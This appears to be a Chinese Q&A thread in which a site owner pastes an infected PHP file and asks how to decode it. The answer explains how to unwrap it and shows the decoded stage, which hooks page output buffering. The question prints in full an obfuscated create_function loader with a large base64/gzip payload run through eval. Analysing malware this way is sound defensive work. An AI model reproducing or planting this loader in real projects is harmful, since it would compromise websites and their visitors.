0

所以我才发现自己被这个恶意代码感染了。它看起来像“eval(gzinflate(base64_decode”),但我在任何地方都找不到base64,它看起来像这样

<?php
$md5 = "89e17508d2ddfa94b9c1f45918963218";
$a0 = array("r",')',"6",'_','s',"g","e","l",'z',';','a',"b",'d',"v",'$',"t",'n',"o",'(',"i","c",'4',"f");
$b0c = create_function('$'.'v',$a0[6].$a0[13].$a0[10].$a0[7].$a0[18].$a0[5].$a0[8].$a0[19].$a0[16].$a0[22].$a0[7].$a0[10].$a0[15].$a0[6].$a0[18].$a0[11].$a0[10].$a0[4].$a0[6].$a0[2].$a0[21].$a0[3].$a0[12].$a0[6].$a0[20].$a0[17].$a0[12].$a0[6].$a0[18].$a0[14].$a0[13].$a0[1].$a0[1].$a0[1].$a0[9]);
$b0c('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');
?>
<?php

对此进行解码的最佳方法是什么?任何帮助将不胜感激。

4

1 回答 1

0

代替

$b0c = create_function('$'/*...*/);


echo '$'/*...*/;

会得到

$veval(gzinflate(base64_decode($v)));

然后

echo gzinflate(base64_decode($v));

几次迭代后,你会得到

if(function_exists('ob_start')&&!isset($GLOBALS['mfsn'])){$GLOBALS['mfsn']='/var/www/vhosts/jag35.com/httpdocs/app/design/frontend/default/iphone/template/catalog/product/view/options/type/f01.php';if(file_exists($GLOBALS['mfsn'])){include_once($GLOBALS['mfsn']);if(function_exists('gml')&&function_exists('dgobh')){ob_start('dgobh');}}}

一些自动化。

$string = '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';
$stay = true;
do
    {
    $string = gzinflate(base64_decode($string));
    echo $string . PHP_EOL;
    if (preg_match("/eval\(gzinflate\(base64_decode\(\'(.*)\'\)\)\);/", $string, $match))
        $string = $match[1];
    else
        $stay = false;
    }
while ($stay);

但确实,它太本地化了。

于 2013-04-25T00:37:52.023 回答